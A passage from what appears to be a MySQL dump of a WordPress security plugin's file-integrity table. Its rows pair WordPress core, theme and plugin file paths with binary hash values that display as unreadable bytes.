��Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('��I�����UzYWg!g','wp-includes/blocks/latest-comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ؿ�d6x�T�','�g^��%�je�wo��e�UQu�֨��/�','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uQ��[�F,�Z�ݜ�','Ű�Z�鶤�\'.�iT��*�\\�OBjYf^�k:�','',0,'?'),('ƍp�=Z\0�S_���$','wp-includes/blocks/cover/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q׶9�O\Z;`��B���','�hk}�K��<�g8�D=~���E��K�0��','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('��\n	�m�7�sl��','wp-content/themes/newsmagbd/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3o]��\\~�9�BH��','�\"�%0�#�T���K�%���]�W�2<���+P','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�;/�]Г��s�M�','R\"��l�8w�&l�3Z����O���ֳwk��','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5 �������I�Wc�','���~�w�(�=Iu*��\\��O�\r������','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A˨mʟ����OJ(','h֘���۰�ߕ��-@_�h���\n�����]�f�','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('fMx���	�+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��u�r���SN,�A','e�����PK�r�Vz��979�����n\0��','',0,'?'),('}:\\��.?B��B','wp-includes/blocks/post-content/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Np�E�� ;�J{��','��B�@\\H�N8�P��ߣ�D��.���','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<+SU1+��f2e','F�ν����0lބ�\r��^,����iOk�8','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@	DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),(';^3<���	r�&�r','wp-content/plugins/redirection/matches/from-notfrom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ư��i�Ά�n��xc','��ܑI��o�\r|��A:�9��L�c���8','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('R�\\�&��T	�|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��J�b��X�t@C�','~�/�X����`����-�?��ڱ�a�X�|','',0,'?'),('tt̸�T�.�*óU�','wp-content/plugins/wordfence/modules/login-security/views/page/role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!|3�is:���y�',']F��ŀ�T��ݵ�*�b`u��n��9��\'(�','',0,'?'),('ynm�;�/�UsK	��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�U��2񎆷����','y�Ԫ�٪>tPn�ΞX�!\'�˕?��A��E','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1@K2��k5՜�~@��','�5�J�w��A���@�7��]���\\I\n��Hъ','',0,'?'),('��,d$\\Zޟ^Wu�','wp-includes/blocks/buttons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���jJZ	^�Q','7\'�$�����6�\'�z�i#ɖZ��O�8','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','񘅊��8��9a�','�svZ�����kr\r��܈D:auu����','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�\"�<	i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('	ߊ�A�\r��#\"!�','wp-content/plugins/redirection/database/schema/220.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jM�\Z�A~�s.�H�','u��~���{�.�?��!��ytK}��','',0,'?'),('L��bP�-I׭1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϳ,���u�[��@}�','�tr�L.�S�[+�\Z\"�dΌg|����h�xާ','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' ��ɉ:�s�{1<�','wp-includes/blocks/embed/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ġ�-�y7!�ʾ�U','���2�񉣊U\'���I_c1��B�z�}��','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2#	�3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}jORI�plD�','�F�m��ճ(b���x���.W�N2���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' I\Z��61``��B�b�','wp-content/themes/newsmagbd/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xؘ�;��%~ϕ,m�','��f��s�y�4*k�borT�q�Ĭ[n�!��','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:jC�o\0\"��R�','*(��P�0eU�����!7p�Y�v��3','',0,'?'),(' �y��>4�l��gR�','wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�Z� 8�Z�','��y� �q��k���j���|���gY{���','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�(	ia�Y���(','����%��\Z0b��[u�#�v.�_��	O�=0','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �\r$	Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)Y{�Q���[��','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),(' ������t4${�SE','wp-includes/blocks/categories/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#7ֽr\rг����','#1��1*D�?��J<=��|(\'.ċb]E���3��','',0,'?'),('!\n�φ\r��\Z<�\\�C�','wp-admin/css/index.php',0,'�&��F���:�d���','�&��F���:�d���','M!|^;>�bI$FΘ\ZY���N��ϣ%4\\�?5�','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���C�\0��Ol$�','sT�lEe��Bh�v:�g%�k��07k=��&!','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�G�Q�^83','�X�m!L��o�|_2*�A5B�ƞ\0Y��','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�<��9Wht_[','��=�0R�vk�Lbf��>(9�4�+Nm�M���','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!��>�NN����ٌ�','wp-includes/blocks/file/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�)btu���u��k','f�):1�9I<��\r��U\n�_�!kv|QC��^','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����-�ߠ2g�l�','Ӏ���OD��I{`�b��ı�=ʬs�m��q.','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�k)�L����B�','��v�PXsP;rQ3�����|�#�&@��#','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m$̃�Mz�k���','��zf��_{I���다�H�b�L#ʝ$�O�Ѭ�','',0,'?'),('!�Tۦ����	l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɳ��xm46c)��','en�*���~�a�يc]��Zbi�XCq��','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+*_A­|UY�˻','��&���,p\0H�AUƫ��LI��t���[�','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�Do����Flz�','^��E����XD�o���v�orW��x�Y��\Z','',0,'?'),('\"\n���4j�SË�','wp-includes/blocks/spacer/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k���k�3z��U)�','u2�T��z\"����-g���&]�V�j��$O>�','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('\"\r↻�7l~��˝A�','wp-includes/blocks/text-columns/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$6Eɫ8�y','�\\{�1�E��H=F�\'ֱ��L�=t�0�X�','',0,'?'),('\"(}G��r�	0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�?�X�� �n�\Z��P3�L','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�0���Ã�p|̉(','\\�;��2؞��ۙTS����\no\'�\Z�!���*q�','',0,'?'),('\"^��n@cђ��\0�1KU','wp-content/themes/newsmagbd/vendors/owl.carousel/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�΁zv�X��u�oW�','D#-�@i�2���}���ڛ�*	B��<��','',0,'?'),('\"q����	K6A���!','wp-includes/css/dist/reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�J_Z�w�;���','�R�=�WA)ш���`S{.�)�u�MM�F{�','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eB�Ē���i�𣨷','��8y�Nnm��\\ڌ�4�b/��d��*}H','',0,'?'),('\"��(�m��0ܷ}w','wp-content/themes/newsmagbd/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	gs~�!UÛfGC','\nZ���#@��¤�\0@g��℺�	�\"���','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"����ۯ��6��7?','wp-includes/blocks/site-title/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rgm/��S��&;w',']BkU�J�(�υ�|9���| C��p����,','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�Z�_Z\0\0���y�','wp-content/plugins/wp-cerber/assets/flags/mu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�1�����($+a�','m� )���5p�PP�:�|X������u��\0j�','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j,�f�d����','��c�g,����	T���3�N���Y','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l?7�\\�z�1e���&','\r����J�/��t�J�h�bT�2�j��%kM�','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"���^+����3�-','wp-content/plugins/redirection/matches/server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oz��|�os�%�f�','C��?�O�ϋ�\"�l��CD�02��:�;�~�','',0,'?'),('\"�D�Z~\0�|�3���','wp-includes/blocks/query/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g���A[N�\"/�','�@z@Ҵ:ot�`�+�?�u}�3U*3�M`>q}D','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����y�T�#���','PX�ü����P�qTg��N�,�K���','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#49��%��8n{Ӂ�t','wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\'c�7� 6��y��2','����\r>V��f�;Æ\Z������(��/4�','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�jQb��c�uV޾','4���zڜ\n�A⧑ˆB��/1�쀗��a{)','',0,'?'),('#W�\n��Y�,!Z��*�','wp-content/plugins/wp-cerber/assets/flags/sn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��-#��9���uQ','i}2��3��&�ܓ��w0��r��wJ,�','',0,'?'),('#^ ̉�Θ!�M�z?{{','wp-content/plugins/wp-cerber/assets/flags/gs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~�\Z7c�o#.','o=b�i�e�U�\Z�N�1>��Vy��..��3Z`�','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r���|�P4&.|��','�%Mu���#��g��]�zmܦ���8���u�','',0,'?'),('#煽$8f5m�v�5�','wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ѯ�N���ϕ�','��w��-�2�XR�(��&W��&H���b���','',0,'?'),('#�\\M��@�0���T�','wp-includes/blocks/post-excerpt/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qj�)O=S�R��','oC�l\'�6IJ�j���2�\'\Z�l\'�\n��}{','',0,'?'),('#�-g�\\L%3�S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0	��6�ӭ�Iv����hJ��`����','',0,'?'),('#�ۘ�ƿ��.u�L� ','wp-content/plugins/redirection/locale/json/redirection-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�/����C�y��/�*','\Z�6�j\0��Q���b������hi��YW��(','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('$&��A�ÆJ���_!6�','wp-content/plugins/wp-cerber/assets/flags/my.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QG��M� �;k��=�','_PL��0�\0�:��sP㱤��bˆ�G6Ia�','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F����Y�`�8�','^�z�y�{b�.n�&o@�{�<,�$��}�','',0,'?'),('$8}��eD$�赑�','wp-content/plugins/redirection/fileio/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A{=]���_�p,0','p�Ϛ.o�v�%�L�8CB����M�\'�l�\Zg','',0,'?'),('$N�P��9������','wp-content/plugins/wp-cerber/assets/flags/tn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$Z�,a��8&��1','�E[�\"�-+����Np�m����f��p�+�W�','',0,'?'),('$Vw����;!�:\Z�a�','wp-content/plugins/redirection/locale/redirection-fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���^9���','*xz��%Q?5d�wT�\nsl�A�)��ϬX','',0,'?'),('$t���\\�p=-a�','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԇ���@k�����$','|�Q�/�8o�@zn� X�O�FUJ�)��J��ѯ','',0,'?'),('$�w�7���@)s&��V&','wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¨S�N]eD6�����@','<�j��3a���a��k�l-X���','',0,'?'),('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��\"��V%		|','�X>����[6_��\\��a�3�����s�V','',0,'?'),('$���C����/�9��','wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ik���s','^&�V�b��,��s��B^�R�4�Ѹ����V','',0,'?'),('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','